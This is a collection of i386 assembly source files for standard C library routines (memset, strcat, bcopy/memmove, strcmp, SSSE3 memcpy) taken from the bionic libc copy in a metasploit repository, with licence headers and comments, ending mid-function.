movl %eax, -5(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 6: dword + word. */
L(aligned_16_118bytes):
movdqa %xmm0, -118(%edx)
L(aligned_16_102bytes):
movdqa %xmm0, -102(%edx)
L(aligned_16_86bytes):
movdqa %xmm0, -86(%edx)
L(aligned_16_70bytes):
movdqa %xmm0, -70(%edx)
L(aligned_16_54bytes):
movdqa %xmm0, -54(%edx)
L(aligned_16_38bytes):
movdqa %xmm0, -38(%edx)
L(aligned_16_22bytes):
movdqa %xmm0, -22(%edx)
L(aligned_16_6bytes):
movl %eax, -6(%edx)
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 7: dword + word + byte. */
L(aligned_16_119bytes):
movdqa %xmm0, -119(%edx)
L(aligned_16_103bytes):
movdqa %xmm0, -103(%edx)
L(aligned_16_87bytes):
movdqa %xmm0, -87(%edx)
L(aligned_16_71bytes):
movdqa %xmm0, -71(%edx)
L(aligned_16_55bytes):
movdqa %xmm0, -55(%edx)
L(aligned_16_39bytes):
movdqa %xmm0, -39(%edx)
L(aligned_16_23bytes):
movdqa %xmm0, -23(%edx)
L(aligned_16_7bytes):
movl %eax, -7(%edx)
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 8: final qword from the low half of %xmm0. */
L(aligned_16_120bytes):
movdqa %xmm0, -120(%edx)
L(aligned_16_104bytes):
movdqa %xmm0, -104(%edx)
L(aligned_16_88bytes):
movdqa %xmm0, -88(%edx)
L(aligned_16_72bytes):
movdqa %xmm0, -72(%edx)
L(aligned_16_56bytes):
movdqa %xmm0, -56(%edx)
L(aligned_16_40bytes):
movdqa %xmm0, -40(%edx)
L(aligned_16_24bytes):
movdqa %xmm0, -24(%edx)
L(aligned_16_8bytes):
movq %xmm0, -8(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 9: qword + byte. */
L(aligned_16_121bytes):
movdqa %xmm0, -121(%edx)
L(aligned_16_105bytes):
movdqa %xmm0, -105(%edx)
L(aligned_16_89bytes):
movdqa %xmm0, -89(%edx)
L(aligned_16_73bytes):
movdqa %xmm0, -73(%edx)
L(aligned_16_57bytes):
movdqa %xmm0, -57(%edx)
L(aligned_16_41bytes):
movdqa %xmm0, -41(%edx)
L(aligned_16_25bytes):
movdqa %xmm0, -25(%edx)
L(aligned_16_9bytes):
movq %xmm0, -9(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 10: qword + word. */
L(aligned_16_122bytes):
movdqa %xmm0, -122(%edx)
L(aligned_16_106bytes):
movdqa %xmm0, -106(%edx)
L(aligned_16_90bytes):
movdqa %xmm0, -90(%edx)
L(aligned_16_74bytes):
movdqa %xmm0, -74(%edx)
L(aligned_16_58bytes):
movdqa %xmm0, -58(%edx)
L(aligned_16_42bytes):
movdqa %xmm0, -42(%edx)
L(aligned_16_26bytes):
movdqa %xmm0, -26(%edx)
L(aligned_16_10bytes):
movq %xmm0, -10(%edx)
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 11: qword + word + byte. */
L(aligned_16_123bytes):
movdqa %xmm0, -123(%edx)
L(aligned_16_107bytes):
movdqa %xmm0, -107(%edx)
L(aligned_16_91bytes):
movdqa %xmm0, -91(%edx)
L(aligned_16_75bytes):
movdqa %xmm0, -75(%edx)
L(aligned_16_59bytes):
movdqa %xmm0, -59(%edx)
L(aligned_16_43bytes):
movdqa %xmm0, -43(%edx)
L(aligned_16_27bytes):
movdqa %xmm0, -27(%edx)
L(aligned_16_11bytes):
movq %xmm0, -11(%edx)
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 12: qword + dword. */
L(aligned_16_124bytes):
movdqa %xmm0, -124(%edx)
L(aligned_16_108bytes):
movdqa %xmm0, -108(%edx)
L(aligned_16_92bytes):
movdqa %xmm0, -92(%edx)
L(aligned_16_76bytes):
movdqa %xmm0, -76(%edx)
L(aligned_16_60bytes):
movdqa %xmm0, -60(%edx)
L(aligned_16_44bytes):
movdqa %xmm0, -44(%edx)
L(aligned_16_28bytes):
movdqa %xmm0, -28(%edx)
L(aligned_16_12bytes):
movq %xmm0, -12(%edx)
movl %eax, -4(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 13: qword + dword + byte. */
L(aligned_16_125bytes):
movdqa %xmm0, -125(%edx)
L(aligned_16_109bytes):
movdqa %xmm0, -109(%edx)
L(aligned_16_93bytes):
movdqa %xmm0, -93(%edx)
L(aligned_16_77bytes):
movdqa %xmm0, -77(%edx)
L(aligned_16_61bytes):
movdqa %xmm0, -61(%edx)
L(aligned_16_45bytes):
movdqa %xmm0, -45(%edx)
L(aligned_16_29bytes):
movdqa %xmm0, -29(%edx)
L(aligned_16_13bytes):
movq %xmm0, -13(%edx)
movl %eax, -5(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 14: qword + dword + word. */
L(aligned_16_126bytes):
movdqa %xmm0, -126(%edx)
L(aligned_16_110bytes):
movdqa %xmm0, -110(%edx)
L(aligned_16_94bytes):
movdqa %xmm0, -94(%edx)
L(aligned_16_78bytes):
movdqa %xmm0, -78(%edx)
L(aligned_16_62bytes):
movdqa %xmm0, -62(%edx)
L(aligned_16_46bytes):
movdqa %xmm0, -46(%edx)
L(aligned_16_30bytes):
movdqa %xmm0, -30(%edx)
L(aligned_16_14bytes):
movq %xmm0, -14(%edx)
movl %eax, -6(%edx)
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
/* Group N mod 16 == 15: qword + dword + word + byte.  Last group,
   so it ends with RETURN_END (no re-push of the saved register). */
L(aligned_16_127bytes):
movdqa %xmm0, -127(%edx)
L(aligned_16_111bytes):
movdqa %xmm0, -111(%edx)
L(aligned_16_95bytes):
movdqa %xmm0, -95(%edx)
L(aligned_16_79bytes):
movdqa %xmm0, -79(%edx)
L(aligned_16_63bytes):
movdqa %xmm0, -63(%edx)
L(aligned_16_47bytes):
movdqa %xmm0, -47(%edx)
L(aligned_16_31bytes):
movdqa %xmm0, -31(%edx)
L(aligned_16_15bytes):
movq %xmm0, -15(%edx)
movl %eax, -7(%edx)
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN_END
END (sse2_memset5_atom)
|
OpenWireSec/metasploit | 1,479 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcat.S | /* $OpenBSD: strcat.S,v 1.8 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
#if defined(APIWARN)
#APP
.section .gnu.warning.strcat
.ascii "warning: strcat() is almost always misused, please use strlcat()"
#NO_APP
#endif
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
/*
 * char *strcat(char *dst, const char *src)
 * i386 SysV ABI: arguments on the stack, returns the original dst
 * in %eax.  Locates the NUL terminator of dst with repne/scasb,
 * then copies src (including its terminator) eight bytes per
 * unrolled iteration.
 * Clobbers: %eax, %ecx, %edx, flags; %edi is saved and restored.
 */
ENTRY(strcat)
pushl %edi /* save edi */
movl 8(%esp),%edi /* dst address */
movl 12(%esp),%edx /* src address */
pushl %edi /* push destination address (popped into %eax as return value) */
cld /* set search forward */
xorl %eax,%eax /* set search for null terminator */
movl $-1,%ecx /* set search for lots of characters */
repne /* search! */
scasb
leal -1(%edi),%ecx /* correct dst address: %edi stopped one past the NUL */
.align 2,0x90
L1: movb (%edx),%al /* unroll loop, but not too much */
movb %al,(%ecx) /* copy byte, then stop if it was the NUL */
testb %al,%al
jz L2
movb 1(%edx),%al
movb %al,1(%ecx)
testb %al,%al
jz L2
movb 2(%edx),%al
movb %al,2(%ecx)
testb %al,%al
jz L2
movb 3(%edx),%al
movb %al,3(%ecx)
testb %al,%al
jz L2
movb 4(%edx),%al
movb %al,4(%ecx)
testb %al,%al
jz L2
movb 5(%edx),%al
movb %al,5(%ecx)
testb %al,%al
jz L2
movb 6(%edx),%al
movb %al,6(%ecx)
testb %al,%al
jz L2
movb 7(%edx),%al
movb %al,7(%ecx)
addl $8,%edx /* advance both pointers past the unrolled chunk */
addl $8,%ecx
testb %al,%al
jnz L1
L2: popl %eax /* pop destination address (return value) */
popl %edi /* restore edi */
ret
|
OpenWireSec/metasploit | 2,604 | external/source/meterpreter/source/bionic/libc/arch-x86/string/bcopy.S | /* $OpenBSD: bcopy.S,v 1.5 2005/08/07 11:30:38 espie Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from locore.s.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* (ov)bcopy (src,dst,cnt)
* ws@tools.de (Wolfgang Solfrank, TooLs GmbH) +49-228-985800
*/
/*
 * Built three ways depending on the preprocessor:
 *   MEMCOPY: memcpy(dst, src, n)   -- returns dst
 *   MEMMOVE: memmove(dst, src, n)  -- returns dst, overlap-safe
 *   default: bcopy(src, dst, n)    -- swapped argument order
 * Copies a word at a time with a byte tail.  When dst >= src the
 * copy runs backwards (DF set), so overlapping regions are handled
 * on every variant.  DF is cleared again before returning.
 * Clobbers: %eax, %ecx, %edx, flags; %esi/%edi saved and restored.
 */
#ifdef MEMCOPY
ENTRY(memcpy)
#else
#ifdef MEMMOVE
ENTRY(memmove)
#else
ENTRY(bcopy)
#endif
#endif
pushl %esi
pushl %edi
#if defined(MEMCOPY) || defined(MEMMOVE)
movl 12(%esp),%edi /* dst (first arg) */
movl 16(%esp),%esi /* src (second arg) */
movl %edi, %eax /* return value = dst */
#else
movl 12(%esp),%esi /* bcopy: src is the first arg */
movl 16(%esp),%edi
#endif
movl 20(%esp),%ecx /* n */
movl %ecx,%edx /* keep a copy of n for the byte tail */
cmpl %esi,%edi /* potentially overlapping? */
jnb 1f
cld /* nope, copy forwards. */
shrl $2,%ecx /* copy by words */
rep
movsl
movl %edx,%ecx
andl $3,%ecx /* any bytes left? */
rep
movsb
popl %edi
popl %esi
ret
1:
addl %ecx,%edi /* copy backwards. */
addl %ecx,%esi
std /* DF=1: string ops decrement */
andl $3,%ecx /* any fractional bytes? */
decl %edi /* point at the last byte of each buffer */
decl %esi
rep
movsb
movl %edx,%ecx
shrl $2,%ecx /* then the whole words, backwards */
subl $3,%esi /* step back from last-byte to last-word addresses */
subl $3,%edi
rep
movsl
popl %edi
popl %esi
cld /* restore DF=0 per the ABI before returning */
ret
|
OpenWireSec/metasploit | 1,274 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcmp.S | /* $OpenBSD: strcmp.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
/*
 * int strcmp(const char *s1, const char *s2)
 * Byte-by-byte comparison, unrolled eight deep.  On the first
 * mismatch or NUL in s1, returns the difference of the two bytes
 * as unsigned chars (movzbl) in %eax.
 * Clobbers: %eax, %ecx, %edx, flags.
 */
ENTRY(strcmp)
movl 0x04(%esp),%eax /* s1 */
movl 0x08(%esp),%edx /* s2 */
jmp L2 /* Jump into the loop! */
.align 2,0x90
L1: incl %eax
incl %edx
L2: movb (%eax),%cl
testb %cl,%cl /* null terminator??? */
jz L3
cmpb %cl,(%edx) /* chars match??? */
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
je L1
.align 2, 0x90
/* Mismatch or NUL: compute *s1 - *s2 with zero-extended bytes. */
L3: movzbl (%eax),%eax /* unsigned comparison */
movzbl (%edx),%edx
subl %edx,%eax
ret
|
OpenWireSec/metasploit | 1,730 | external/source/meterpreter/source/bionic/libc/arch-x86/string/bcopy_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSSE3)
# include "cache_wrapper.S"
# undef __i686
# define MEMCPY bcopy
# define USE_AS_MEMMOVE
# define USE_AS_BCOPY
# include "ssse3-memcpy5.S"
#else
# include "bcopy.S"
#endif
|
OpenWireSec/metasploit | 1,793 | external/source/meterpreter/source/bionic/libc/arch-x86/string/cache_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* Values are optimized for Atom */
#define SHARED_CACHE_SIZE (512*1024) /* Atom L2 Cache */
#define DATA_CACHE_SIZE (24*1024) /* Atom L1 Data Cache */
#define SHARED_CACHE_SIZE_HALF (SHARED_CACHE_SIZE / 2)
#define DATA_CACHE_SIZE_HALF (DATA_CACHE_SIZE / 2)
|
OpenWireSec/metasploit | 40,428 | external/source/meterpreter/source/bionic/libc/arch-x86/string/ssse3-memcpy5.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef MEMCPY
# define MEMCPY ssse3_memcpy5
#endif
#ifndef L
# define L(label) .L##label
#endif
#ifndef ALIGN
# define ALIGN(n) .p2align n
#endif
#ifndef cfi_startproc
# define cfi_startproc .cfi_startproc
#endif
#ifndef cfi_endproc
# define cfi_endproc .cfi_endproc
#endif
#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off) .cfi_rel_offset reg, off
#endif
#ifndef cfi_restore
# define cfi_restore(reg) .cfi_restore (reg)
#endif
#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off) .cfi_adjust_cfa_offset off
#endif
#ifndef ENTRY
# define ENTRY(name) \
.type name, @function; \
.globl name; \
.p2align 4; \
name: \
cfi_startproc
#endif
#ifndef END
# define END(name) \
cfi_endproc; \
.size name, .-name
#endif
#ifdef USE_AS_BCOPY
# define SRC PARMS
# define DEST SRC+4
# define LEN DEST+4
#else
# define DEST PARMS
# define SRC DEST+4
# define LEN SRC+4
#endif
#define CFI_PUSH(REG) \
cfi_adjust_cfa_offset (4); \
cfi_rel_offset (REG, 0)
#define CFI_POP(REG) \
cfi_adjust_cfa_offset (-4); \
cfi_restore (REG)
#define PUSH(REG) pushl REG; CFI_PUSH (REG)
#define POP(REG) popl REG; CFI_POP (REG)
#ifdef SHARED
# define PARMS 8 /* Preserve EBX. */
# define ENTRANCE PUSH (%ebx);
# define RETURN_END POP (%ebx); ret
# define RETURN RETURN_END; CFI_PUSH (%ebx)
# define JMPTBL(I, B) I - B
/* Load an entry in a jump table into EBX and branch to it. TABLE is a
jump table with relative offsets. INDEX is a register contains the
index into the jump table. SCALE is the scale of INDEX. */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE, INDEX, SCALE) \
/* We first load PC into EBX. */ \
call __i686.get_pc_thunk.bx; \
/* Get the address of the jump table. */ \
addl $(TABLE - .), %ebx; \
/* Get the entry and convert the relative offset to the \
absolute address. */ \
addl (%ebx,INDEX,SCALE), %ebx; \
/* We loaded the jump table. Go. */ \
jmp *%ebx
# define BRANCH_TO_JMPTBL_ENTRY_VALUE(TABLE) \
addl $(TABLE - .), %ebx
# define BRANCH_TO_JMPTBL_ENTRY_TAIL(TABLE, INDEX, SCALE) \
addl (%ebx,INDEX,SCALE), %ebx; \
/* We loaded the jump table. Go. */ \
jmp *%ebx
/*
 * Classic i386 PIC thunk: loads the caller's return address (i.e.
 * the PC at the call site) into %ebx so the caller can form
 * GOT-relative addresses.  Placed in a linkonce section so multiple
 * objects defining it collapse into one copy at link time.
 */
.section .gnu.linkonce.t.__i686.get_pc_thunk.bx,"ax",@progbits
.globl __i686.get_pc_thunk.bx
.hidden __i686.get_pc_thunk.bx
ALIGN (4)
.type __i686.get_pc_thunk.bx,@function
__i686.get_pc_thunk.bx:
movl (%esp), %ebx /* %ebx = return address = caller's PC */
ret
#else
# define PARMS 4
# define ENTRANCE
# define RETURN_END ret
# define RETURN RETURN_END
# define JMPTBL(I, B) I
/* Branch to an entry in a jump table. TABLE is a jump table with
absolute offsets. INDEX is a register contains the index into the
jump table. SCALE is the scale of INDEX. */
# define BRANCH_TO_JMPTBL_ENTRY(TABLE, INDEX, SCALE) \
jmp *TABLE(,INDEX,SCALE)
# define BRANCH_TO_JMPTBL_ENTRY_VALUE(TABLE)
# define BRANCH_TO_JMPTBL_ENTRY_TAIL(TABLE, INDEX, SCALE) \
jmp *TABLE(,INDEX,SCALE)
#endif
/*
 * void *MEMCPY(void *dst, const void *src, size_t n)
 * MEMCPY expands to the configured name (ssse3_memcpy5 by default);
 * argument order swaps to (src, dst, n) under USE_AS_BCOPY, and the
 * copy is overlap-safe under USE_AS_MEMMOVE.  This is the entry and
 * dispatch: small copies go straight to a jump table; larger ones
 * align the destination to 16 bytes and select a handler by the
 * resulting source misalignment (%edi & 0xf).
 * (Function continues past the end of this view.)
 */
.section .text.ssse3,"ax",@progbits
ENTRY (MEMCPY)
ENTRANCE
movl LEN(%esp), %ecx
movl SRC(%esp), %eax
movl DEST(%esp), %edx
#ifdef USE_AS_MEMMOVE
/* memmove: choose direction.  Copy backwards only when the regions
   truly overlap with dst inside [src, src+n). */
cmp %eax, %edx
jb L(copy_forward)
je L(fwd_write_0bytes)
cmp $32, %ecx
jae L(memmove_bwd)
jmp L(bk_write_less32bytes_2)
L(memmove_bwd):
add %ecx, %eax
cmp %eax, %edx /* dst < src + n ? then overlapping */
movl SRC(%esp), %eax
jb L(copy_backward)
L(copy_forward):
#endif
cmp $48, %ecx
jae L(48bytesormore)
L(fwd_write_less32bytes):
#ifndef USE_AS_MEMMOVE
/* NOTE(review): heuristic overlap guard comparing only the low
   bytes of src/dst -- overlap is formally undefined for memcpy. */
cmp %dl, %al
jb L(bk_write)
#endif
add %ecx, %edx
add %ecx, %eax
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
#ifndef USE_AS_MEMMOVE
L(bk_write):
BRANCH_TO_JMPTBL_ENTRY (L(table_48_bytes_bwd), %ecx, 4)
#endif
ALIGN (4)
/* ECX > 32 and EDX is 4 byte aligned. */
L(48bytesormore):
movdqu (%eax), %xmm0 /* first 16 bytes, stored later once %esi is set */
PUSH (%edi)
movl %edx, %edi
and $-16, %edx
PUSH (%esi)
add $16, %edx /* %edx = dst rounded up to 16-byte alignment */
movl %edi, %esi /* %esi = original dst (for the unaligned head store) */
sub %edx, %edi /* %edi = -(bytes in the unaligned head) */
add %edi, %ecx /* shrink count by the head length */
sub %edi, %eax /* advance src correspondingly */
#ifdef SHARED_CACHE_SIZE_HALF
cmp $SHARED_CACHE_SIZE_HALF, %ecx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
cmp __x86_shared_cache_size_half@GOTOFF(%ebx), %ecx
# else
cmp __x86_shared_cache_size_half, %ecx
# endif
#endif
mov %eax, %edi
jae L(large_page) /* very large copy: non-temporal path (not in view) */
and $0xf, %edi /* source misalignment relative to 16 */
jz L(shl_0)
BRANCH_TO_JMPTBL_ENTRY (L(shl_table), %edi, 4)
ALIGN (4)
/*
 * Source and destination congruent mod 16: pure aligned 16-byte
 * moves.  First store the unaligned head captured in %xmm0, then
 * copy 32 bytes per iteration (unrolled x4) for counts <= 127;
 * larger counts go to the gobble path.
 */
L(shl_0):
movdqu %xmm0, (%esi) /* write the unaligned head at the original dst */
xor %edi, %edi /* %edi = running offset from (%eax)/(%edx) */
POP (%esi)
cmp $127, %ecx
ja L(shl_0_gobble)
lea -32(%ecx), %ecx /* bias so borrow flags the final iteration */
L(shl_0_loop):
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
jb L(shl_0_end)
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
jb L(shl_0_end)
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
jb L(shl_0_end)
movdqa (%eax, %edi), %xmm0
movdqa 16(%eax, %edi), %xmm1
sub $32, %ecx
movdqa %xmm0, (%edx, %edi)
movdqa %xmm1, 16(%edx, %edi)
lea 32(%edi), %edi
L(shl_0_end):
lea 32(%ecx), %ecx /* undo the bias: %ecx = tail length */
add %ecx, %edi
add %edi, %edx /* rebase dst/src pointers past the copied region */
add %edi, %eax
POP (%edi)
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
/*
 * Aligned copies larger than 127 bytes: 128 bytes per iteration.
 * If the count reaches half the L1 data cache, switch to the
 * prefetching memory loop below; otherwise run the plain cached
 * loop here, then peel 64/32/16-byte chunks and finish via the
 * jump table.
 */
L(shl_0_gobble):
#ifdef DATA_CACHE_SIZE_HALF
cmp $DATA_CACHE_SIZE_HALF, %ecx
#else
# ifdef SHARED
call __i686.get_pc_thunk.bx
add $_GLOBAL_OFFSET_TABLE_, %ebx
cmp __x86_data_cache_size_half@GOTOFF(%ebx), %ecx
# else
cmp __x86_data_cache_size_half, %ecx
# endif
#endif
POP (%edi)
lea -128(%ecx), %ecx /* bias by one chunk; loop exits when < 0 */
jae L(shl_0_gobble_mem_loop)
L(shl_0_gobble_cache_loop):
movdqa (%eax), %xmm0
movdqa 0x10(%eax), %xmm1
movdqa 0x20(%eax), %xmm2
movdqa 0x30(%eax), %xmm3
movdqa 0x40(%eax), %xmm4
movdqa 0x50(%eax), %xmm5
movdqa 0x60(%eax), %xmm6
movdqa 0x70(%eax), %xmm7
lea 0x80(%eax), %eax
sub $128, %ecx
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa %xmm2, 0x20(%edx)
movdqa %xmm3, 0x30(%edx)
movdqa %xmm4, 0x40(%edx)
movdqa %xmm5, 0x50(%edx)
movdqa %xmm6, 0x60(%edx)
movdqa %xmm7, 0x70(%edx)
lea 0x80(%edx), %edx
jae L(shl_0_gobble_cache_loop)
cmp $-0x40, %ecx /* at least 64 bytes left after unbiasing? */
lea 0x80(%ecx), %ecx /* undo the bias (flags from cmp above are used) */
jl L(shl_0_cache_less_64bytes)
movdqa (%eax), %xmm0
sub $0x40, %ecx
movdqa 0x10(%eax), %xmm1
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
movdqa 0x20(%eax), %xmm0
movdqa 0x30(%eax), %xmm1
add $0x40, %eax
movdqa %xmm0, 0x20(%edx)
movdqa %xmm1, 0x30(%edx)
add $0x40, %edx
L(shl_0_cache_less_64bytes):
cmp $0x20, %ecx
jb L(shl_0_cache_less_32bytes)
movdqa (%eax), %xmm0
sub $0x20, %ecx
movdqa 0x10(%eax), %xmm1
add $0x20, %eax
movdqa %xmm0, (%edx)
movdqa %xmm1, 0x10(%edx)
add $0x20, %edx
L(shl_0_cache_less_32bytes):
cmp $0x10, %ecx
jb L(shl_0_cache_less_16bytes)
sub $0x10, %ecx
movdqa (%eax), %xmm0
